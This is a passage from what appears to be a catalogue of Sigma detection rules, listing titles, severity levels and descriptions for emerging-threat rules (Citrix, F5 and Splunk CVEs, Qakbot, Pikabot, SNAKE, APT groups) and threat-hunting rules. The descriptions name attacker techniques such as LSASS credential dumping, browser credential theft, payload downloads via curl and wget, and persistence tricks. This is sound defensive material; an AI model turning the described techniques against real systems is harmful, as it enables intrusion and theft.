    Description: Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing
  • Exploitation Attempt Of CVE-2023-46214 Using Public POC Code - Level: high
    Description: Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code
  • CVE-2023-46747 Exploitation Activity - Proxy - Level: high
    Description: Detects exploitation activity of CVE-2023-46747, an unauthenticated remote code execution vulnerability in F5 BIG-IP.
  • CVE-2023-46747 Exploitation Activity - Webserver - Level: high
    Description: Detects exploitation activity of CVE-2023-46747, an unauthenticated remote code execution vulnerability in F5 BIG-IP.
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy - Level: high
    Description: Detects an exploitation attempt of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, via proxy logs by looking for a very long host header string.
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy - Level: medium
    Description: Detects a potential exploitation attempt of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, via proxy logs.
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver - Level: medium
    Description: Detects a potential exploitation attempt of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, via webserver logs.
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver - Level: high
    Description: Detects an exploitation attempt of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, via webserver logs by looking for a very long host header string.
  • Potential Exploitation Attempt Of Undocumented WindowsServer RCE - Level: high
    Description: Detects a potential exploitation attempt of an undocumented Windows Server pre-auth remote code execution (RCE)
  • Potential SocGholish Second Stage C2 DNS Query - Level: high
    Description: Detects a DNS query initiated from a "wscript" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic
  • Potential COLDSTEEL RAT File Indicators - Level: high
    Description: Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants.
  • Potential COLDSTEEL Persistence Service DLL Creation - Level: high
    Description: Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT
  • Potential COLDSTEEL Persistence Service DLL Load - Level: high
    Description: Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name have been seen used by ColdSteel as the service DLL for its persistence mechanism
  • COLDSTEEL RAT Anonymous User Process Execution - Level: high
    Description: Detects the creation of a process executing as a user called "ANONYMOUS", seen used by the "MileStone2016" variant of COLDSTEEL
  • COLDSTEEL RAT Cleanup Command Execution - Level: critical
    Description: Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples
  • COLDSTEEL RAT Service Persistence Execution - Level: critical
    Description: Detects the creation of an "svchost" process with specific command line flags that were seen present and used by ColdSteel RAT
  • Potential COLDSTEEL RAT Windows User Creation - Level: high
    Description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT.
  • COLDSTEEL Persistence Service Creation - Level: high
    Description: Detects the creation of new services potentially related to COLDSTEEL RAT
  • DarkGate - Autoit3.EXE File Creation By Uncommon Process - Level: medium
    Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes constitute non-standard and suspicious ways to retrieve the Autoit3 executable.
  • DarkGate - Autoit3.EXE Execution Parameters - Level: high
    Description: Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate command-and-control server.
  • DarkGate - User Created Via Net.EXE - Level: high
    Description: Detects creation of local users via the net.exe command with the name of "DarkGate"
  • Griffon Malware Attack Pattern - Level: critical
    Description: Detects process execution patterns related to Griffon malware as reported by Kaspersky
  • Injected Browser Process Spawning Rundll32 - GuLoader Activity - Level: high
    Description: Detects the execution of installed GuLoader malware on the host. GuLoader initiates network connections via the rundll32.exe process, which is spawned by an injected browser parent process.
  • IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 - Level: high
    Description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID
  • Potential Pikabot C2 Activity - Level: high
    Description: Detects the execution of rundll32 that leads to an external network connection. The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.
  • Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE - Level: medium
    Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads: "curl" and "wget" are used to download extra payloads, "ping" and "timeout" are abused to introduce delays in the command execution, and "rundll32" is used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above is used to orchestrate the download and execution of malicious DLL files.
  • Potential Pikabot Discovery Activity - Level: high
    Description: Detects system discovery activity carried out by Pikabot, including network, user and domain group information. The malware Pikabot has been seen to use this technique as part of its C2 botnet registration, within a short collection time frame (less than 1 minute).
  • Potential Pikabot Hollowing Activity - Level: high
    Description: Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries
  • Pikabot Fake DLL Extension Execution Via Rundll32.EXE - Level: high
    Description: Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.
  • Qakbot Regsvr32 Calc Pattern - Level: high
    Description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
  • Potential Qakbot Rundll32 Execution - Level: high
    Description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity.
  • Qakbot Rundll32 Exports Execution - Level: critical
    Description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
  • Qakbot Rundll32 Fake DLL Extension Execution - Level: critical
    Description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
  • Qakbot Uninstaller Execution - Level: high
    Description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet
  • Rhadamanthys Stealer Module Launch Via Rundll32.EXE - Level: medium
    Description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
  • Rorschach Ransomware Execution Activity - Level: critical
    Description: Detects Rorschach ransomware execution activity
  • SNAKE Malware Kernel Driver File Indicator - Level: critical
    Description: Detects SNAKE malware kernel driver file indicator
  • SNAKE Malware WerFault Persistence File Creation - Level: high
    Description: Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity
  • SNAKE Malware Installer Name Indicators - Level: low
    Description: Detects filename indicators associated with the SNAKE malware as reported by CISA in their report
  • Potential SNAKE Malware Installation CLI Arguments Indicator - Level: high
    Description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report
  • Potential SNAKE Malware Installation Binary Indicator - Level: high
    Description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report
  • Potential SNAKE Malware Persistence Service Execution - Level: high
    Description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA.
  • SNAKE Malware Covert Store Registry Key - Level: high
    Description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA
  • Potential Encrypted Registry Blob Related To SNAKE Malware - Level: medium
    Description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA
  • SNAKE Malware Service Persistence - Level: critical
    Description: Detects the creation of a service named "WerFaultSvc" which seems to be used by the SNAKE malware as a persistence mechanism as described by CISA in their report
  • Ursnif Redirection Of Discovery Commands - Level: high
    Description: Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.
  • Potential Compromised 3CXDesktopApp Beaconing Activity - DNS - Level: high
    Description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise
  • Malicious DLL Load By Compromised 3CXDesktopApp - Level: critical
    Description: Detects DLL load activity of known compromised DLLs used by the compromised 3CXDesktopApp
  • Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon - Level: high
    Description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise
  • Potential Compromised 3CXDesktopApp Execution - Level: high
    Description: Detects execution of known compromised version of 3CXDesktopApp
  • Potential Suspicious Child Process Of 3CXDesktopApp - Level: high
    Description: Detects potentially suspicious child processes of "3CXDesktopApp.exe", which could be related to the 3CXDesktopApp supply chain compromise
  • Potential Compromised 3CXDesktopApp Update Activity - Level: high
    Description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software
  • Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy - Level: high
    Description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise
  • Potential Compromised 3CXDesktopApp ICO C2 File Download - Level: high
    Description: Detects potential malicious .ICO file downloads from a compromised 3CXDesktopApp via web requests to the malicious GitHub repository
  • Diamond Sleet APT DNS Communication Indicators - Level: high
    Description: Detects DNS queries related to Diamond Sleet APT activity
  • Diamond Sleet APT File Creation Indicators - Level: high
    Description: Detects file creation activity that is related to Diamond Sleet APT activity
  • Diamond Sleet APT DLL Sideloading Indicators - Level: high
    Description: Detects DLL sideloading activity seen used by Diamond Sleet APT
  • Diamond Sleet APT Process Activity Indicators - Level: high
    Description: Detects process creation activity indicators related to Diamond Sleet APT
  • Diamond Sleet APT Scheduled Task Creation - Registry - Level: high
    Description: Detects a registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of the TeamCity CVE-2023-42793 vulnerability
  • Diamond Sleet APT Scheduled Task Creation - Level: critical
    Description: Detects a registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of the TeamCity CVE-2023-42793 vulnerability
  • Potential Operation Triangulation C2 Beaconing Activity - DNS - Level: high
    Description: Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB
  • Potential Operation Triangulation C2 Beaconing Activity - Proxy - Level: high
    Description: Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB
  • Potential APT FIN7 Related PowerShell Script Created - Level: high
    Description: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts
  • Potential APT FIN7 POWERHOLD Execution - Level: high
    Description: Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs
  • Potential POWERTRASH Script Execution - Level: high
    Description: Detects potential execution of the PowerShell script POWERTRASH
  • Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity - Level: high
    Description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution
  • Lace Tempest File Indicators - Level: high
    Description: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7
  • Lace Tempest PowerShell Evidence Eraser - Level: high
    Description: Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team
  • Lace Tempest PowerShell Launcher - Level: high
    Description: Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team
  • Lace Tempest Cobalt Strike Download - Level: high
    Description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
  • Lace Tempest Malware Loader Execution - Level: high
    Description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team
  • Lazarus APT DLL Sideloading Activity - Level: high
    Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
  • Mint Sandstorm - AsperaFaspex Suspicious Process Execution - Level: critical
    Description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
  • Mint Sandstorm - Log4J Wstomcat Process Execution - Level: high
    Description: Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity
  • Mint Sandstorm - ManageEngine Suspicious Process Execution - Level: critical
    Description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
  • Potential APT Mustang Panda Activity Against Australian Gov - Level: high
    Description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52
  • Okta 2023 Breach Indicator Of Compromise - Level: medium
    Description: Detects new user account creation or activation with specific names related to the Okta Support System 2023 breach. This rule can be enhanced by filtering out known and legitimate usernames used in your environment.
  • Onyx Sleet APT File Creation Indicators - Level: high
    Description: Detects file creation activity that is related to Onyx Sleet APT activity
  • PaperCut MF/NG Exploitation Related Indicators - Level: high
    Description: Detects exploitation indicators related to PaperCut MF/NG Exploitation
  • PaperCut MF/NG Potential Exploitation - Level: high
    Description: Detects suspicious child processes of "pc-app.exe", which could indicate potential exploitation of PaperCut
  • Peach Sandstorm APT Process Activity Indicators - Level: high
    Description: Detects process creation activity related to Peach Sandstorm APT
  • Potential Peach Sandstorm APT C2 Communication Activity - Level: medium
    Description: Detects potential C2 communication activity related to Peach Sandstorm APT
  • UNC4841 - Email Exfiltration File Pattern - Level: high
    Description: Detects filename pattern of email related data used by UNC4841 for staging and exfiltration
  • UNC4841 - Barracuda ESG Exploitation Indicators - Level: high
    Description: Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
  • UNC4841 - SSL Certificate Exfiltration Via Openssl - Level: high
    Description: Detects the execution of "openssl" to connect to an IP address. This technique was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.
  • UNC4841 - Download Compressed Files From Temp.sh Using Wget - Level: high
    Description: Detects execution of "wget" to download ".zip" or ".rar" files from "temp.sh", as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
  • UNC4841 - Download Tar File From Untrusted Direct IP Via Wget - Level: high
    Description: Detects execution of "wget" to download a "tar" file from an IP address that doesn't have a trusted certificate, as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
  • UNC4841 - Potential SEASPY Execution - Level: critical
    Description: Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation - Level: medium
    Description: Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled. As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.
  • Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group - Level: high
    Description: Detects execution of the "net.exe" command in order to add a group named "ESX Admins". This could indicate a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on a domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
  • Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity - Level: high
    Description: Detects any creation or modification of a Windows domain group with the name "ESX Admins". This could indicate a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on a domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
  • CVE-2024-49113 Exploitation Attempt - LDAP Nightmare - Level: high
    Description: Detects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on "Application Error" log where the faulting application is "lsass.exe" and the faulting module is "WLDAP32.dll".
  • Potential KamiKakaBot Activity - Lure Document Execution - Level: medium
    Description: Detects the execution of a Word document via the WinWord Start Menu shortcut. This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
  • Potential KamiKakaBot Activity - Shutdown Schedule Task Creation - Level: medium
    Description: Detects the creation of a scheduled task that runs weekly and executes the "shutdown /l /f" command. This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
  • Potential KamiKakaBot Activity - Winlogon Shell Persistence - Level: high
    Description: Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.
  • Potential Raspberry Robin Aclui Dll SideLoading - Level: high
    Description: Detects potential sideloading of a malicious "aclui.dll" by OleView. This behavior was observed in Raspberry-Robin variants reported by Check Point Research in February 2024.
  • Potential Raspberry Robin CPL Execution Activity - Level: high
    Description: Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. This behavior was observed in multiple Raspberry-Robin variants.
  • Potential Raspberry Robin Registry Set Internet Settings ZoneMap - Level: low
    Description: Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024. Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.
  • DPRK Threat Actor - C2 Communication DNS Indicators - Level: high
    Description: Detects DNS queries for C2 domains used by DPRK Threat actors.
detection.threat_hunting 113
Show Rules (113)
  • Potential DLL Injection Via AccCheckConsole - Level: medium
    Description: Detects the execution of "AccCheckConsole", a command-line tool for verifying the accessibility implementation of an application's UI. One of the tests that this checker can run is called a "verification routine", which tests for things like Consistency, Navigation, etc. The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass them via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.
  • Mail Forwarding/Redirecting Activity In O365 - Level: medium
    Description: Detects email forwarding or redirecting activity in O365 Audit logs.
  • Python Path Configuration File Creation - Linux - Level: medium
    Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
  • Okta Password Health Report Query - Level: low
    Description: Detects all activities against the endpoint "/reports/password-health/*" which should only be accessed via OKTA Admin Console UI. Use this rule to hunt for potential suspicious requests. Correlate this event with "admin console" login and alert on requests without any corresponding admin console login
  • Terminate Linux Process Via Kill - Level: medium
    Description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.
  • Process Discovery - Level: low
    Description: Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
  • Python Path Configuration File Creation - MacOS - Level: medium
    Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
  • Clipboard Data Collection Via Pbpaste - Level: medium
    Description: Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout). The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands. It can also be used in shell scripts that may require clipboard content as input. Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information. Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
  • .Class Extension URI Ending Request - Level: medium
    Description: Detects requests to URIs ending with the ".class" extension in proxy logs. This rule can be used to hunt for potential downloads of Java classes as seen, for example, in Log4shell exploitation attacks against Log4j.
  • Firewall Rule Modified In The Windows Firewall Exception List - Level: low
    Description: Detects when a rule has been modified in the Windows firewall exception list
  • Access To Browser Credential Files By Uncommon Applications - Security - Level: low
    Description: Detects file access requests to browser credential stores by uncommon processes. Could indicate a potential attempt at credential stealing. This rule requires heavy baselining before usage.
  • Scheduled Task Deletion - Level: low
    Description: Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME
  • Potential Remote WMI ActiveScriptEventConsumers Activity - Level: medium
    Description: Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network. This event is best correlated and used as an enrichment to determine the potential lateral movement activity.
  • CreateRemoteThread API and LoadLibrary - Level: medium
    Description: Detects potential use of the CreateRemoteThread API and LoadLibrary function to inject a DLL into a process.
  • Remote Thread Creation Via PowerShell - Level: medium
    Description: Detects the creation of a remote thread from a PowerShell process to another process.
  • Access To Browser Credential Files By Uncommon Applications - Level: low
    Description: Detects file access requests to browser credential stores by uncommon processes. Could indicate potential attempt of credential stealing. Requires heavy baselining before usage
  • Access To Chromium Browsers Sensitive Files By Uncommon Applications - Level: low
    Description: Detects file access requests to chromium based browser sensitive files by uncommon processes. Could indicate potential attempt of stealing sensitive information.
  • Access To Windows Outlook Mail Files By Uncommon Applications - Level: low
    Description: Detects file access requests to Windows Outlook Mail by uncommon processes. Could indicate potential attempt of credential stealing. Requires heavy baselining before usage
  • Access To Sysvol Policies Share By Uncommon Process - Level: medium
    Description: Detects file access requests to the Windows Sysvol Policies Share by uncommon processes
  • Access To .Reg/.Hive Files By Uncommon Applications - Level: low
    Description: Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups.
  • Unattend.XML File Access Attempt - Level: low
    Description: Detects attempts to access the "unattend.xml" file, where credentials might be stored. This file is used during the unattended windows install process.
  • ADS Zone.Identifier Deleted - Level: low
    Description: Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
  • DMP/HDMP File Creation - Level: low
    Description: Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.
  • Python Path Configuration File Creation - Windows - Level: medium
    Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
  • Scheduled Task Created - FileCreation - Level: low
    Description: Detects the creation of a scheduled task via file creation.
  • Creation of an Executable by an Executable - Level: low
    Description: Detects the creation of an executable by another executable.
  • VsCode Code Tunnel Execution File Indicator - Level: medium
    Description: Detects the creation of a file with the name "code_tunnel.json", which indicates execution and usage of the VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel.
  • WebDAV Temporary Local File Creation - Level: medium
    Description: Detects the creation of WebDAV temporary files with potentially suspicious extensions
  • Non-DLL Extension File Renamed With DLL Extension - Level: medium
    Description: Detects rename operations of files with non-DLL extensions to files with a DLL extension. This is often performed by malware in order to avoid initial detections based on extensions.
  • Amsi.DLL Load By Uncommon Process - Level: low
    Description: Detects loading of Amsi.dll by uncommon processes
  • Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process - Level: medium
    Description: Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process. The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.
  • System Drawing DLL Load - Level: low
    Description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture.
  • Microsoft Excel Add-In Loaded - Level: low
    Description: Detects Microsoft Excel loading an Add-In (.xll) file
  • Microsoft Word Add-In Loaded - Level: low
    Description: Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence.
  • WMI Module Loaded By Uncommon Process - Level: low
    Description: Detects WMI modules being loaded by an uncommon process
  • Dfsvc.EXE Network Connection To Non-Local IPs - Level: medium
    Description: Detects network connections from "dfsvc.exe", used to handle ClickOnce applications, to non-local IPs.
  • Dllhost.EXE Initiated Network Connection To Non-Local IP Address - Level: medium
    Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address. Aside from Microsoft's own IP range, which needs to be excluded, network communication from Dllhost will depend entirely on the hosted DLL. An initial baseline is recommended before deployment.
  • HH.EXE Initiated HTTP Network Connection - Level: medium
    Description: Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.
  • Msiexec.EXE Initiated Network Connection Over HTTP - Level: low
    Description: Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443. Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. Use this rule to hunt for potentially anomalous or suspicious communications.
  • Network Connection Initiated By PowerShell Process - Level: low
    Description: Detects a network connection that was initiated from a PowerShell process. Oftentimes malicious PowerShell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. Use this rule as a basis for hunting for anomalies.
  • Potentially Suspicious Azure Front Door Connection - Level: medium
    Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2) that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
  • Network Connection Initiated From Users\Public Folder - Level: medium
    Description: Detects a network connection initiated from a process located in the "C:\Users\Public" folder. Attackers are known to drop their malicious payloads and malware in this directory as it is writable by everyone. Use this rule to hunt for potentially suspicious or uncommon activity in your environment.
  • PsExec Default Named Pipe - Level: low
    Description: Detects PsExec service default pipe creation
  • Uncommon PowerShell Hosts - Level: medium
    Description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
  • bXOR Operator Usage In PowerShell Command Line - PowerShell Classic - Level: low
    Description: Detects PowerShell execution that makes use of the bxor (Bitwise XOR) operator. Attackers might use this as an alternative obfuscation method to Base64 encoded commands. Investigate the CommandLine and process tree to determine if the activity is malicious.
  • Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet - Level: low
    Description: Detects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" to enumerate the local firewall rules on a host.
  • Compress-Archive Cmdlet Execution - Level: low
    Description: Detects PowerShell scripts that make use of the "Compress-Archive" cmdlet in order to compress folders and files. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
  • Windows Mail App Mailbox Access Via PowerShell Script - Level: medium
    Description: Detects PowerShell scripts that try to access the default Windows MailApp MailBox. This indicates manipulation of or access to the stored emails of a user. E.g. this could be used by an attacker to exfiltrate or delete the content of the emails.
  • New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock - Level: low
    Description: Detects when a PowerShell script contains calls to the "New-NetFirewallRule" cmdlet in order to add a new firewall rule with an "Allow" action.
  • SMB over QUIC Via PowerShell Script - Level: medium
    Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments
  • Potential Registry Reconnaissance Via PowerShell Script - Level: medium
    Description: Detects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software.
  • Use Of Remove-Item to Delete File - ScriptBlock - Level: low
    Description: Detects PowerShell "Remove-Item" with "-Path" to delete a file, or a folder with "-Recurse".
  • Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet - Level: medium
    Description: Detects the execution of a PowerShell script with a call to the "Send-MailMessage" cmdlet along with the "-Attachments" flag. This could be a potential sign of data exfiltration via email. Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
  • WinAPI Library Calls Via PowerShell Scripts - Level: medium
    Description: Detects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
  • WinAPI Function Calls Via PowerShell Scripts - Level: medium
    Description: Detects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
  • Potential Credential Dumping Attempt Via PowerShell - Level: medium
    Description: Detects a PowerShell process requesting access to "lsass.exe", which can be indicative of potential credential dumping attempts
  • Uncommon GrantedAccess Flags On LSASS - Level: medium
    Description: Detects process access to LSASS memory with uncommon access flags 0x410 and 0x01410
  • Potential Shellcode Injection - Level: medium
    Description: Detects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject.
  • Password Protected Compressed File Extraction Via 7Zip - Level: low
    Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.
  • Set Files as System Files Using Attrib.EXE - Level: low
    Description: Detects the execution of "attrib" with the "+s" flag to mark files as system files
  • CMD Shell Output Redirect - Level: low
    Description: Detects the use of the redirection character ">" to redirect information on the command line. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
  • Potential File Override/Append Via SET Command - Level: low
    Description: Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign. Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly. Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt". The typical use case of the "set /p=" command is to prompt the user for input.
  • Dynamic .NET Compilation Via Csc.EXE - Hunting - Level: medium
    Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
  • File Download Via Curl.EXE - Level: medium
    Description: Detects file download using curl.exe
  • Curl.EXE Execution - Level: low
